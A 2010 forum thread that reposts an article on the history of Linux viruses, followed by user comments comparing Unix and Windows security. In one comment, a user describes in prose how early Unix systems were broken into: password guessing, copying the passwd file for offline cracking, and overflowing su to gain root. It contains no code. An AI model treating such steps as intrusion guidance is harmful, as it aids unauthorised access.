Skip to comments.A history of viruses on Linux
Posted on 11/29/2010 5:35:05 AM PST by ShadowAce
We recently gave you a brief history of viruses on the Mac and as requested by a user we wanted to give you a history of viruses on Linux. Given the tight security integrated into Linux, it is difficult to take advantage of a vulnerability on the computer, but some programmers have found ways around the security measures. There are several free options for anti-virus on Linux that you really should use, even if it isn't always running - a weekly or monthly scan doesn't hurt. Free anti-virus solutions include: ClamAV, AVG, Avast and F-Prot.
The cracker group VLAD wrote the first Linux virus named Staog. The virus took advantage of a flaw in the Kernel that allowed it to stay resident on the machine and wait for a binary file to be executed. Once executed the virus would attach itself to that file. Shortly after the virus was discovered the flaw was fixed and the virus quickly became extinct. VLAD was also responsible for writing the first known virus for Windows 95, Boza.
The Bliss computer virus made its way out into the wild. The virus would attach itself to executables on the system and prevent them from running. A user had to have root access for the virus to be affected, and to this day Debian lists itself as still being vulnerable to this virus. The threat to Debian is minimal though as users do not typically run as root.
No significant viruses were reported this year but oddly enough a hoax message went around stating there was a virus that was threatening to install Linux on your computer. At the time the Melissa virus was ravaging PCs worldwide and on April 1, 1999 (April Fools Day) a message went out warning that a virus named Tuxissa was running about secretly installing Linux on unsuspecting computers.
A rather harmless virus, Virus.Linux.Winter.341, showed up and inserted itself into ELF files; ELF files are executable Linux files. The virus was very small, only 341 bytes, and would insert LoTek by Wintermute into the Notes section of an ELF file. The virus was also supposed to change the computer name to Wintermute but never gained control of a machine to effect the change.
This was an eventful year for Linux viruses; the first was the ZipWorm, a harmless virus that would simply attach itself to any zip files located in the same directory it was executed in. Next was the Satyr virus which was also a harmless virus, it would simply attach itself to ELF files adding the string unix.satyr version 1.0 (c)oded jan-2001 by Shitdown [MIONS], http://shitdown.sf.**(edited as URL causes Avast to block page). There was also a virus released called Ramen which would replace index.html files with their own version displaying Ramen Crew at the top and a package of Ramen Noodles at the bottom. Later a worm by the name of Cheese came out that actually closed the backdoors created by the Ramen virus. There were several other viruses released this year that were relatively harmless.
A vulnerability in Apache led to the creation and spread of the Mighty worm. The worm would exploit a vulnerability in Apache's SSL interface, then infect the unsuspecting victims computer. Once on the computer it would create a secret connection to an IRC server and join a channel to wait for commands to be sent to it.
Another harmless virus showed up, it was called the Rike virus. The virus, which was written in assembly language, would attach it self to an ELF file. Once attached it would expand the space the file required and write RIKE into that free space.
Similar to the virus from the previous year, the Binom virus would simply expand the size of the file and write the string [ Cyneox/DCA in to the free space. The virus was spread by executing an infected file.
The Lupper worm began spreading to vulnerable Linux web servers. The worm would hit a web server looking for a specific URL, then it would attempt to exploit a vulnerable PHP/CGI script. If the server then allowed remote shell command execution and file downloads, it would become infected and begin searching for another server to infect.
A variant of the Mighty worm from 2002 named Kaiten was born. It would open a connection to an IRC channel and wait for commands to be sent and executed.
An exploit in OpenOffice led to the spread of a virus named BadBunny. This virus would infect Windows, Mac and Linux machines. The virus creates a file called badbunny.py as an XChat script and creates badbunny.pl, a Perl virus infecting other Perl files. There was also a trojan horse released by the name of Rexob. Once on the machine, it would open a backdoor allowing remote code execution.
A website for GNOME users to download screensavers and other pieces of eye-candy unknowingly hosted a malicious screen saver called WaterFall. Once installed on the machine it would open up a backdoor that when executed would cause the machine to assist in a distributed denial of service attack (DDOS). The DDOS attack was very specific and targeted a specific website, MMOwned.com.
The koobface virus, a virus that spreads through social networking sites targets Windows, Mac and, in a more recent variant, Linux computers. Once infected, the virus attempts to gather login information for FTP and social networking sites. Once your password has been compromised the virus will send an infected message to all of your friends in your social network.
This is by no means a complete list of Linux viruses but it does cover the major ones. It also points out that most of the viruses found on Linux are fairly harmless. That doesn't mean they don't exist though. Be sure to keep an eye on what your downloading and where you're going on the Internet and you will most likely stay virus free. An occasional virus scan wouldn't hurt either.
Windows focused on functionality while unix/linux focused on stability and security. MS grabbed market share . . . and the vast majority of the viruses.
Exactly. Also, Windows focused on single-user machines. That is a very different mindset than multiuser systems. They are still trying to recover from that.
If that’s the virus history of Linux, then we’ve established that Linux has to be a damn safe system. Imagine a Microsoft virus history...
I blame a lack of willingness to harshly punish those who engage in such criminal conspiracy.
That's certainly one aspect of it. Another is the ability of 9-yo script kiddies to write virii for a mainstream OS. That should tell you something about the OS itself.
The same people who wrote the first Linux virus wrote the first Win-95 virus.
Check your OS ego and attack problems, not platforms.
Governments, hipsters, and organized crime push out malware that cost billions in lost productivity and “software scanning” solutions.
But apparently, the view among political leadership is “we can absorb a computer attack” just as Barack Obama, POTUS, claims with regards to a terrorist attack.
9-year trained infantryman from Afghanistan could also cause a plane to nosedive.
Hackers are scum who deserved to be erradicated as any other terrorist or embezzler. It is malicious vandalism of the worst sort.
I do have the ability to recognize where problems exist. One of those problems is the platform. I am NOT excusing the virus writer and malicious hacker.
If Mercedes started advertising that their cars were now lock-free, or (for a modest fee) a metal loop could be attached that you can then use to twist a paperclip around to keep car thieves out, would you then blame only the thieves, or would you try to get Mercedes to beef up their security?
It is the same thing. Windows, while it does have some security, is not as strong as it could be. This is done in the name of "backward compatibility" and functionality.
The platform does bear some of the responsibility, while the black hats bear all of it.
I don’t blame the firm that made the highway when a thief or drunk flees from police down the wrong side of the road.
“because it’s there” is no excuse to doing pure evil.
The lack of willpower to adequately pursue those who engage in such criminal conspiracy has left us where we are today.
And I consider it an issue of national defense worthy of the full powers of our defenses.
And although Unix had a reasonably sophisticated concept of file priviliges (especially for its time), default file privileges were kind of loose. This was to be expected in the cooperative, non-adversarial environment in which Unix arose.
The password mechanism was innovative, in that passwords were not stored in plain text, but were encrypted, using each password as its own key. This led the designers to make the user file, with its encrypted passwords, publicly readable. That allowed for extensive brute-force attempts to crack the password file, after it was copied somewhere else, off-line.
And with any reasonable number of users, at least one user would have a trivial password (this was before there was any built-in enforcement of password complexity). A colleague of mine wrote a snooper program that examined the passwd file for trivial passwords, and reported the results to him. He was continually uncovering trivial, and therefore, easily hackable, passwords.
Therefore, you could hack into the system by guessing passwords. Then, you'd go straight to the password file and ftp it to your own machine. Then, you'd go to work exhaustively testing random passwords, encrypted against themselves, against all entries in the file. You might get lucky and hit on somebody with real privileges, and of course then you were in, with whatever privileges the hittee had.
Of course, if you knew the exact structure of the shell object code, you could log in from Joe Schmo's non-privileged account, and fill the password field with a long string that would overwrite the critical part of the su command handling code with instructions that would simply make you super-user on the spot. Then you were also in, wihtout having to guess the password of any user with real power.
We won't have time to list them all.
I'll have to assume that this was a while ago, as all modern unixes that I know use the /etc/shadow file rather than storing the password in the /etc/passwd file.
Permissions on /etc/shadow is 000 ...
ls -al /etc/shad*
---------- 1 root root 2665 2010-11-11 14:24 /etc/shadow
----------. 1 root root 2543 2010-11-04 11:39 /etc/shadow-
Without already having an exploit, it would be kind of difficult to get at.
You're right that early versions of Unix were much more loose permission-wise on many files and directories. Fortunately, as the environment became more hostile, it was much easier to secure the environment because it was based on the premise of multiple users in the first place. Microsoft had to start from a single-user system that essentially had no permissions granularity at all to something more secure, and the world has felt the pain of some of the architectural desisions they made during the process.
Yeah, most of my Unix dealings were from '78 to about '85.
Microsoft had to start from a single-user system that essentially had no permissions granularity at all to something more secure, and the world has felt the pain of some of the architectural desisions they made during the process.
And I feel that pain every time I try to fix up the functionality of my W/XP and Vista file sharing here at the shack.